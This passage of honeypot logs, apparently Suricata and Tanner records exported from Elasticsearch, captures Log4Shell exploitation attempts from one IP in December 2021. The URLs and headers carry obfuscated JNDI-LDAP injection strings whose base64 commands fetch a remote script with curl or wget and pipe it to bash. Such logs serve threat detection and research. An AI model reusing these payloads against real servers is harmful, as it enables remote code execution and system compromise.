""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""6df6e1a7-c363-4f8a-9ab8-3dbac0298e5a""}}}, ""timestamp"": ""2021-12-14T21:38:31.678975""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE5OS4xODc6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjE5Ny4xOTkuMTg3OjgwKXxiYXNo}",,,,,,,,,,,index,1,1,"0.6.0","6df6e1a7-c363-4f8a-9ab8-3dbac0298e5a","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",38706,,,,,,,,,200,,,busypie,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:38:31.678975",,,,,,,,,Tanner,,,"035399ad-996b-49dd-87b2-60898c1c684f",
"2021-12-14T21:35:13.222Z",1,"pm_eun0B6VkG8jKz-d3R","logstash-suricata-2021.12.14",,"_doc","daf66bca-4182-4b64-a1c9-093eabe273bb",60f7bc953f65,"e63712fd-ba53-4d68-a3c3-3323597fd694",60f7bc953f65,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,292921300515481,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,60f7bc953f65,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",123174830,,"{""timestamp"":""2021-12-14T21:35:13.222744+0000"",""flow_id"":292921300515481,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":55962,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",55962,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:35:13.222744+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:35:13.222Z",1,"p2_eun0B6VkG8jKz-d3R","logstash-suricata-2021.12.14",,"_doc","daf66bca-4182-4b64-a1c9-093eabe273bb",60f7bc953f65,"e63712fd-ba53-4d68-a3c3-3323597fd694",60f7bc953f65,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",55962,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text, with very long lines (747)",f57e5b6f34eeacc1c32cb643fb59a98e,"[]",16240,CLOSED,false,0,,,,,,,292921300515481,"Digital Ocean, Inc.",14061,,AS,SG,SG,Singapore,,"172.16.0.42","1.314","{""lon"":103.6839,""lat"":1.314}","103.6839",62,,,"Asia/Singapore",,,,,,,,,,,,,,,60f7bc953f65,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",16240,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",123175955,,"{""timestamp"":""2021-12-14T21:35:13.222744+0000"",""flow_id"":292921300515481,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":55962,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":16240},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text, with very long lines (747)"",""gaps"":false,""state"":""CLOSED"",""md5"":""f57e5b6f34eeacc1c32cb643fb59a98e"",""stored"":false,""size"":16240,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,highvalley,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-14T21:35:13.222744+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:35:12.809Z",1,"qG_eun0B6VkG8jKz-d3Z","logstash-tanner-2021.12.14",,"_doc","daf66bca-4182-4b64-a1c9-093eabe273bb",60f7bc953f65,"e63712fd-ba53-4d68-a3c3-3323597fd694",60f7bc953f65,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",,60f7bc953f65,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",85278,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""fb7cb2fa-8fd4-4c51-af0b-07e07304dd47"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 55962}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""95cbb7ed-d7a2-4417-9074-99e388e3da30""}}}, ""timestamp"": ""2021-12-14T21:35:12.809857""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNTkuODkuMjA3LjIzMDo4MCl8YmFzaA==}",,,,,,,,,,,index,1,1,"0.6.0","95cbb7ed-d7a2-4417-9074-99e388e3da30","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",55962,,,,,,,,,200,,,highvalley,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:35:12.809857",,,,,,,,,Tanner,,,"fb7cb2fa-8fd4-4c51-af0b-07e07304dd47",
"2021-12-14T21:33:40.074Z",1,SQ3dun0B5e7x5EYniwzz,"logstash-suricata-2021.12.14",,"_doc","452d37b9-d260-415f-9b54-08f4845a7ba1",f66858f6c4a0,"eab87799-fa5e-43b8-86d1-d7741f8c33bc",f66858f6c4a0,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1535519757651250,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,f66858f6c4a0,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjY4LjEyLjE1NDo4MDgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjY4LjEyLjE1NDo4MDgwKXxiYXNo}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjY4LjEyLjE1NDo4MDgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",37628853,,"{""timestamp"":""2021-12-14T21:33:40.074433+0000"",""flow_id"":1535519757651250,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":45606,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjY4LjEyLjE1NDo4MDgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjY4LjEyLjE1NDo4MDgwKXxiYXNo}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguNjguMTIuMTU0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM4LjY4LjEyLjE1NDo4MDgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",45606,,,,,,,,,,,,meresorbet,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:33:40.074433+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:33:15.819Z",1,"EW_dun0B6VkG8jKzLtXr","logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2145362162418216,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,119980f12f89,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",10803,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",48284941,,"{""timestamp"":""2021-12-14T21:33:15.819082+0000"",""flow_id"":2145362162418216,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":60850,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10803}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",60850,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:33:15.819082+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:33:15.819Z",1,"Em_dun0B6VkG8jKzLtXr","logstash-suricata-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",60850,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text",c62e5675e85098667aceb6d9c154af41,"[]",10803,CLOSED,false,0,,,,,,,2145362162418216,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,119980f12f89,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",10803,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",48286067,,"{""timestamp"":""2021-12-14T21:33:15.819082+0000"",""flow_id"":2145362162418216,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":60850,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":10803},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text"",""gaps"":false,""state"":""CLOSED"",""md5"":""c62e5675e85098667aceb6d9c154af41"",""stored"":false,""size"":10803,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:33:15.819082+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:33:15.765Z",1,KKHdun0BCXMCNTQLLnT7,"logstash-tanner-2021.12.14",,"_doc","59df7a3d-f031-473d-867f-974ea5d43f1f",119980f12f89,"86426fa8-1315-4e36-b6b1-b6d11f133267",119980f12f89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",,119980f12f89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",116472,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""eb845b2b-c167-459d-a846-8236743459d8"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 60850}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""52336c03-1d21-4f84-a609-5038e8b9c50d""}}}, ""timestamp"": ""2021-12-14T21:33:15.765842""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI0Mi42NDo4MCl8YmFzaA==}",,,,,,,,,,,index,1,1,"0.6.0","52336c03-1d21-4f84-a609-5038e8b9c50d","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",60850,,,,,,,,,200,,,rawcoast,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:33:15.765842",,,,,,,,,Tanner,,,"eb845b2b-c167-459d-a846-8236743459d8",
